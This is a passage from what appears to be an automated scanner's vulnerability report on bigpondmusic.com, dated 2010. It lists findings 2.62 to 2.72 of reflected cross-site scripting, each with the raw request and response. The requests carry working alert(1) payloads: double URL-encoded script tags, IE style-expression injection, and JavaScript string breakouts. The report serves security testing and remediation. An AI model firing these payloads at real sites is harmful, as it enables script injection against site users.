GET /album/grinderman/worm-tamer?6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106658


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?6f27a"style="x:expression(alert(1))"0807d081f23=1" />
...[SNIP]...

2.62. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba08d'%3b1e196c98b41 was submitted in the REST URL parameter 1. This input was echoed as ba08d';1e196c98b41 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumba08d'%3b1e196c98b41/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumba08d';1e196c98b41';
   s.prop4 = 'guy-sebastian';
   s.prop5 = 'twenty-ten';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.63. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85 was submitted in the REST URL parameter 1. This input was echoed as e3ae8"><script>alert(1)</script>70c377bcd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albume3ae8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70c377bcd85/guy-sebastian/twenty-ten/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume3ae8"><script>alert(1)</script>70c377bcd85/guy-sebastian/twenty-ten/" />
...[SNIP]...

2.64. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b was submitted in the cid parameter. This input was echoed as 75d86"style="x:expression(alert(1))"8fb9c4a702b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style%3d"x%3aexpression(alert(1))"8fb9c4a702b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?cid=hm-guy75d86"style="x:expression(alert(1))"8fb9c4a702b" />
...[SNIP]...

2.65. http://bigpondmusic.com/album/guy-sebastian/twenty-ten/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/guy-sebastian/twenty-ten/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d1b"style%3d"x%3aexpression(alert(1))"2964101664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3d1b"style="x:expression(alert(1))"2964101664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/guy-sebastian/twenty-ten/?d3d1b"style%3d"x%3aexpression(alert(1))"2964101664=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 148112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Guy Sebastian - Twenty Ten -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/guy-sebastian/twenty-ten/?d3d1b"style="x:expression(alert(1))"2964101664=1" />
...[SNIP]...

2.66. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b was submitted in the REST URL parameter 1. This input was echoed as 74bc7"><script>alert(1)</script>3d6147d7b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album74bc7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d6147d7b3b/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87993


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album74bc7"><script>alert(1)</script>3d6147d7b3b/james-blunt/some-kind-of-trouble" />
...[SNIP]...

2.67. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e73c'%3bae196294df9 was submitted in the REST URL parameter 1. This input was echoed as 4e73c';ae196294df9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4e73c'%3bae196294df9/james-blunt/some-kind-of-trouble HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4e73c';ae196294df9';
   s.prop4 = 'james-blunt';
   s.prop5 = 'some-kind-of-trouble';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.68. http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/james-blunt/some-kind-of-trouble

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 804a1"style="x:expression(alert(1))"cc0e770a23b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/james-blunt/some-kind-of-trouble?804a1"style%3d"x%3aexpression(alert(1))"cc0e770a23b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>James Blunt - Some Kind Of T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/james-blunt/some-kind-of-trouble?804a1"style="x:expression(alert(1))"cc0e770a23b=1" />
...[SNIP]...

2.69. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154 was submitted in the REST URL parameter 1. This input was echoed as 8a220"><script>alert(1)</script>30cfeaa9154 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8a220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30cfeaa9154/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8a220"><script>alert(1)</script>30cfeaa9154/jebediah/lost-my-nerve" />
...[SNIP]...

2.70. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b225c'%3bbfd4f81406a was submitted in the REST URL parameter 1. This input was echoed as b225c';bfd4f81406a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumb225c'%3bbfd4f81406a/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87850


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumb225c';bfd4f81406a';
   s.prop4 = 'jebediah';
   s.prop5 = 'lost-my-nerve';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.71. http://bigpondmusic.com/album/jebediah/lost-my-nerve [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 was submitted in the h parameter. This input was echoed as 4c136"style="x:expression(alert(1))"9fa3aac2c39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/jebediah/lost-my-nerve?h=7663953484c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97105


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?h=7663953484c136"style="x:expression(alert(1))"9fa3aac2c39" />
...[SNIP]...

2.72. http://bigpondmusic.com/album/jebediah/lost-my-nerve [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14bc1"style="x:expression(alert(1))"5bf96062524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/jebediah/lost-my-nerve?14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 96924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
